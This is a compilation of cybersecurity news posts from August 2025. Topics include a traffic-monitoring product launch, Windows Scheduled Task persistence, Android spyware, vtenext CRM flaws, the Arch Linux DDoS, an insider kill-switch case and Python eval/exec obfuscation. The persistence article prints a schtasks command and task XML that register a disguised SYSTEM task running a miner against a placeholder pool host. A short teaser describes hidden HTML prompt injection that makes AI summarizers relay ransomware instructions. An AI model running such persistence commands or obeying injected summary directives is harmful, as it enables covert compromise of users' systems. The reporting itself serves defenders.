• Dover, DE, United States, August 25th, 2025, CyberNewsWire

    Attaxion announces the addition of the Agentless Traffic Monitoring capability to its exposure management platform. Agentless Traffic Monitoring is a new capability designed to give cybersecurity teams actionable visibility into network traffic flowing to and from their digital assets – all without the need to deploy any agents or sensors on these assets.

    Attaxion uses real-time NetFlow data to provide its users with detailed context about inbound and outbound traffic—including source and destination IP addresses and ports, protocol used, and timestamps of when the traffic was first and last seen. Relying on global NetFlow data instead of local sensors allows to preserve the agentless nature of the solution, making sure Attaxion remains easy to use and doesn’t require deployment.

    Using the NetFlow data and a combination of threat intelligence sources, Attaxion can distinguish between benign and malicious traffic, offering SOC analysts and cybersecurity engineers a quick and easy way of understanding which of their IP addresses are communicating with known malicious IP addresses. 

    Figure 1: Attaxion’s new Agentless Traffic Monitoring feature, identifying malicious traffic to and from the organization’s IP addresses

    A diverse set of connected threat intelligence feeds allows Attaxion to highlight the exact type of attack and in some cases even the exact malware family that is generating the traffic.

    The new feature speeds up incident response, malware detection, and threat hunting, and makes vulnerability management much more effective, allowing network administrators and security engineers to focus on what’s relevant right now.

    “With the level of detail that Agentless Traffic Monitoring provides, security teams can immediately see which assets are interacting with known malicious infrastructure,” said Max Beatty, Head of Growth & Strategy at Attaxion, “This context is incredibly valuable when prioritizing risk. If an asset with a known vulnerability is communicating with a malicious IP, that should be your top priority.”

    The Agentless Traffic Monitoring feature is built to help reduce alert fatigue and focus remediation efforts on high-risk areas within the attack surface. 

    Key capabilities include:

    • Real-time traffic visibility across all exposed assets.
    • Automatic classification of malicious traffic and attack type.
    • Integration with threat intelligence feeds to detect attack types and malware families.
    • Asset-level context to support vulnerability prioritization.

    Figure 2: Attaxion’s Agentless Traffic Monitoring identifies recent command-and-control (C2) activity across malware families and timeframes

    Agentless Traffic Monitoring is now available for Attaxion customers as part of its growing suite of continuous monitoring tools.

    For more information, users can visit https://attaxion.com/capability/traffic-monitoring/.

    About Attaxion

    Attaxion helps organizations discover, monitor, and secure their internet-facing assets. The platform combines automated discovery, continuous assessment, and guided remediation to deliver 97% greater asset visibility and AI-driven vulnerability prioritization — making robust cyber defense accessible to teams of every size. To support early evaluation and integration, Attaxion is available with a 30-day free trial and an asset finder preview tool.

    Contact

    PR Team
    Attaxion LLC
    press@attaxion.com

    The post Attaxion Releases Agentless Traffic Monitoring for Immediate Risk Prioritization appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybercriminals have unveiled a novel variation of the ClickFix social engineering technique that weaponizes AI-powered summarization tools to stealthily distribute ransomware instructions. By leveraging invisible prompt injection and a “prompt overdose” strategy, attackers embed malicious directives within hidden HTML elements that AI summarizers in email clients, browser extensions, and productivity platforms faithfully reproduce in their […]

    The post Hackers Use AI-Generated Summaries to Deliver Ransomware Payloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Over the past year, security teams have observed an uptick in adversaries leveraging native Windows Scheduled Tasks to maintain footholds in compromised environments.

    Unlike elaborate rootkits or zero-day exploits, these techniques exploit built-in system functionality, enabling threat actors to persist without deploying additional binaries or complex toolchains.

    By integrating malicious commands directly into Task Scheduler jobs—triggered on boot, logon, or at timed intervals—attackers achieve stealthy, resilient access that often eludes conventional detection mechanisms.

    Initial infections typically begin with phishing emails or exploit kits delivering lightweight loaders that pivot quickly to persistence.

    Once they achieve execution on the endpoint, attackers invoke either the schtasks.exe binary or PowerShell cmdlets to register new tasks or modify existing ones. These jobs may execute under the SYSTEM account, further complicating detection.

    Early samples targeted financial institutions, while more recent campaigns have expanded into critical infrastructure sectors, highlighting the broad applicability and low operational cost of Scheduled Tasks abuse.

    The DFIR Spot analysts noted the malware’s reliance on triggers such as LogonTrigger and TimeTrigger, configured to execute every five minutes or upon each user logon.

    In multiple engagements, Incident Response teams discovered tasks named to mimic legitimate Windows services—such as “TelemetryUpdater” or “HealthCheck”—but pointing to executables stored in unconventional directories under C:\ProgramData\System.

    This approach allows the malicious components to blend into routine system activity, delaying analysis and remediation.

    Subsequent payloads delivered via these tasks range from coin-mining binaries to remote administration tools.

    Once registered, tasks often self-update by invoking PowerShell scripts that pull additional modules or change command-line arguments.

    Because Task Scheduler logs can be cleared or disabled by attackers, many organizations have struggled to reconstruct timelines without enriched EDR telemetry.

    Persistence Tactics: Malicious Task Registration and Execution

    A core persistence mechanism involves the command-line invocation:-

    schtasks /create /sc minute /mo 5 /tn "Microsoft\Windows\Update\TelemetryUpdater" \
    /tr "C:\ProgramData\System\svchost32.exe --url=stratum+tcp://miner.fakepool.local:3333 --user guest" \
    /ru SYSTEM
    Scheduled Task Creation Command (Source – The DFIR Spot)

    In this snippet, the /sc minute /mo 5 parameters dictate a five-minute interval, while the task name and directory structures mimic authentic Windows updates. Attackers frequently choose TimeTrigger elements in the XML task file to specify both start boundaries and indefinite repetition, as in:

    <Triggers>
      <TimeTrigger>
        <StartBoundary>2025-08-17T00:00:00</StartBoundary>
        <Repetition>
          <Interval>PT5M</Interval>
          <StopAtDurationEnd>false</StopAtDurationEnd>
        </Repetition>
      </TimeTrigger>
    </Triggers>
    Malicious Task XML Configuration (Source – The DFIR Spot)

    After creation, the job executes with SYSTEM privileges, launching a loader that contacts a remote C2 or payload repository.

    By embedding the executable in nonstandard paths and abusing native scheduling features, threat actors achieve persistence without requiring additional exploitation frameworks.

    Detection strategies must include rigorous baselining of legitimate scheduled tasks, monitoring TaskScheduler/Operational logs for Event ID 106 (task registered), and enforcing advanced audit policies to capture Event ID 4698 entries.

    Combining these logs with EDR-driven process lineage analysis can reveal anomalous task creation patterns that diverge from normal administrative operations.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Threat Actors Weaponizing Windows Scheduled Tasks to Establish Persistence Without Requiring Extra Tools appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Doctor Web’s antivirus laboratory has identified a sophisticated Android backdoor malware, designated Android.Backdoor.916.origin, which has been evolving since its initial detection in January 2025. This multifunctional spyware primarily targets representatives of Russian businesses through targeted attacks rather than mass distribution. Attackers disseminate the malicious APK file via private messages in popular messengers, disguising it as […]

    The post New Android Spyware Masquerading as Antivirus Targets Business Executives appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security researcher Mattia “0xbro” Brollo disclosed a trio of severe vulnerabilities in vtenext CRM (versions 25.02 and earlier) that enable unauthenticated attackers to completely bypass login controls and execute arbitrary code on affected installations. Although vtenext quietly patched one of these flaws in version 25.02.1, two equally dangerous vectors remain unaddressed—placing countless small and medium‐sized […]

    The post Multiple vtenext Flaws Allow Attackers to Bypass Authentication and Run Remote Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Arch Linux Project has officially confirmed that its primary infrastructure services have been subjected to an ongoing distributed denial-of-service (DDoS) attack that has persisted for over a week.

    The attack severely impacted user access to critical resources, including the main website, Arch User Repository (AUR), and community forums.

    Key Takeaways
    1. A week-long DDoS has taken down Arch Linux’s site, AUR, and forums.
    2. DevOps uses rate limits, TCP SYN auth, and geo-mirrors.
    3. Mitigation continues with partners, DDoS provider evaluation, and live status updates.

    DDoS Attack Campaign

    The DDoS campaign began affecting Arch Linux services around August 16, 2025, with Leonidas Spyropoulos from the DevOps team initially reporting service disruptions at 5:13 AM. The attack has specifically targeted three core infrastructure components:

    • archlinux.org (main website)
    • aur.archlinux.org (Arch User Repository)
    • bbs.archlinux.org (community forums)

    The DevOps team confirmed on August 21 that the attack represents a sustained volumetric DDoS pattern designed to overwhelm the project’s hosting infrastructure through massive traffic floods. 

    The attack has triggered TCP SYN authentication mechanisms deployed by their hosting provider, causing initial connection resets before legitimate requests can be processed.

    Additionally, the attack methodology involves Layer 3/4 flood attacks that saturate network bandwidth and exhaust server resources. 

    The team has implemented emergency rate limiting and traffic filtering measures while working with their data center operator to deploy additional DDoS scrubbing capabilities.

    Emergency Workarounds 

    The Arch Linux team has established multiple failover mechanisms to maintain essential functionality during the ongoing attack:

    For package management, users can leverage the pacman-mirrorlist package’s default mirror configuration when the primary reflector endpoint becomes unavailable. 

    The team maintains geo-distributed mirrors at geo.mirror.pkgbuild.com for ISO downloads, with mandatory GPG signature verification using key 0x54449A5C.

    AUR package access remains possible through the GitHub mirror repository using the command:

    Arch Linux DDoS Attack

    Documentation access continues via the arch-wiki-docs and arch-wiki-lite packages, which contain recent snapshots of the official wiki content.

    The team has established a dedicated status.archlinux.org endpoint for real-time service monitoring and incident communications, implementing automated health checks across all critical infrastructure components.

    As this volunteer-driven project continues evaluating comprehensive DDoS protection providers while balancing cost, security, and ethical considerations, the DevOps team maintains operational security by keeping specific attack vectors and mitigation tactics confidential until the incident is fully resolved.

    Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.

    The post Arch Linux Confirms Week-Long DDoS Attack Disrupted its Website, Repository, and Forums appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity today moves at the pace of global politics. A single breach can ripple across supply chains, turn a software flaw into leverage, or shift who holds the upper hand. For leaders, this means defense isn’t just a matter of firewalls and patches—it’s about strategy. The strongest organizations aren’t the ones with the most tools, but the ones that see how cyber risks connect to business

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A Chinese national has been sentenced to four years in federal prison for orchestrating a sophisticated insider cyberattack against his former employer’s global network infrastructure. 

    Davis Lu, 55, utilized his privileged access as a software developer to deploy destructive malware that crippled operations across thousands of users worldwide, demonstrating the severe risks posed by malicious insiders with technical expertise.

    Key Takeaways
    1. Davis Lu received 48 months for deploying destructive loops, scripts, and a global kill switch.
    2. His malware (“Hakai,” “HunShui”) and data-wiping foiled recovery.
    3. Highlights insider threats and need for strict access controls.

    The “Kill Switch” Hack

    Lu’s attack methodology involved multiple sophisticated techniques designed to maximize disruption while evading detection. 

    As a software developer at the Beachwood, Ohio-based company from 2007 to 2019, Lu leveraged his intimate knowledge of the organization’s systems to embed malicious code that would activate at strategic intervals.

    The attack arsenal included infinite loop constructs that consumed system resources until servers crashed or became unresponsive, effectively creating a distributed denial-of-service condition from within the network perimeter. 

    Lu systematically deployed code designed to delete user profiles from the company’s Active Directory infrastructure, targeting the centralized authentication system that manages user access across enterprise networks.

    Most notably, Lu implemented a kill switch mechanism he dubbed “IsDLEnabledinAD” – a recursive query checking whether his user account remained active in the Active Directory domain. 

    This dead man’s switch architecture ensured that his termination would trigger widespread system lockouts, demonstrating an advanced understanding of conditional execution logic and persistent threat deployment.

    Lu’s malware naming conventions revealed deliberate psychological warfare elements, with programs labeled “Hakai” (Japanese for “destruction”) and “HunShui” (Chinese for “lethargy”). 

    This semantic approach to malware development indicates sophisticated threat actor methodologies typically associated with nation-state campaigns.

    Prior to his termination, Lu executed comprehensive anti-forensic countermeasures, including encrypted data deletion and deployment of commands designed to prevent digital forensics recovery tools from reconstructing his activities. 

    His browser history revealed research into privilege escalation techniques, process hiding mechanisms, and secure file deletion methods – indicating premeditated obstruction of incident response efforts.

    The kill switch activation on September 9, 2019, when Lu’s credentials were disabled, resulted in immediate global impact affecting thousands of users across the company’s international operations. 

    The attack’s success demonstrates critical vulnerabilities in privileged access management (PAM) systems and highlights the importance of implementing zero-trust architecture principles for insider threat mitigation.

    This case underscores the evolving landscape of insider threats, where technical knowledge becomes weaponized against employers. 

    The Computer Crime and Intellectual Property Section (CCIPS) prosecution represents ongoing federal efforts to combat cybercrime, having secured over 180 convictions since 2020 while recovering more than $350 million in victim funds.

    Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.

    The post Chinese Hacker Jailed for Deploying Kill Switch on Ohio-based Key Company’s Global Network appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated obfuscation technique that threat actors are using to bypass detection systems and exploit Python’s eval() and exec() functions for malicious code execution. 

    With over 100 supply chain attacks reported on PyPI in the past five years, these techniques pose a significant risk to organizations relying on Python packages.

    Key Takeaways
    1. Hackers hide malicious eval or exec calls using homoglyphs, string tricks, and alternate imports.
    2. Payloads layer encodings and abuse builtins, sys.modules, globals(), locals().
    3. Defenses require advanced static analysis, sandboxing, ML, and human review.

    The growing threat landscape has prompted the development of advanced static analysis tools like Hexora, designed to detect obfuscated malicious code that traditional regex-based security tools often miss. 

    Unlike simple pattern matching, these attacks leverage Python’s dynamic nature to execute arbitrary code while evading conventional security measures.

    Advanced Obfuscation Techniques 

    According to Artem Golubin, the basic malicious code injection employs sophisticated evasion methods. The most elementary approach involves direct function calls:

    Exploit eval or exec Python Calls

    However, experienced threat actors utilize confusable homoglyphs to bypass regex-based detection systems:

    Exploit eval or exec Python Calls

    This technique exploits Unicode characters that visually resemble standard ASCII characters, making detection significantly more challenging for security tools that rely on simple string matching.

    More advanced attackers leverage the built-in module to obscure malicious intent:

    Exploit eval or exec Python Calls

    The __import__ dunder function provides another evasion vector, allowing attackers to avoid conventional import statements while maintaining functionality:

    Exploit eval or exec Python Calls

    Threat actors frequently employ string concatenation and reversal to obfuscate function names and module references. Alternative module access methods include exploiting sys.modules, globals(), and locals().

    The compile() function offers another attack vector, allowing code execution without direct eval() or exec() calls:

    Exploit eval or exec Python Calls

    Payloads delivered through these methods typically employ multiple encoding layers, including base64, hexadecimal, rot13, marshal, and zlib compression, to further obscure malicious intent. 

    This multi-layered approach makes static analysis extremely challenging and often requires dynamic analysis or sandboxing techniques.

    Security professionals recommend implementing comprehensive detection strategies that combine static analysis, dynamic analysis, machine learning models, and human oversight to identify these sophisticated attacks before they compromise production environments effectively.

    Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.

    The post Hackers Can Exploit (eval) or (exec) Python Calls to Execute Malicious Code appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security Information and Event Management (SIEM) systems act as the primary tools for detecting suspicious activity in enterprise networks, helping organizations identify and respond to potential attacks in real time. However, the new Picus Blue Report 2025, based on over 160 million real-world attack simulations, revealed that organizations are only detecting 1 out of 7 simulated attacks,

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶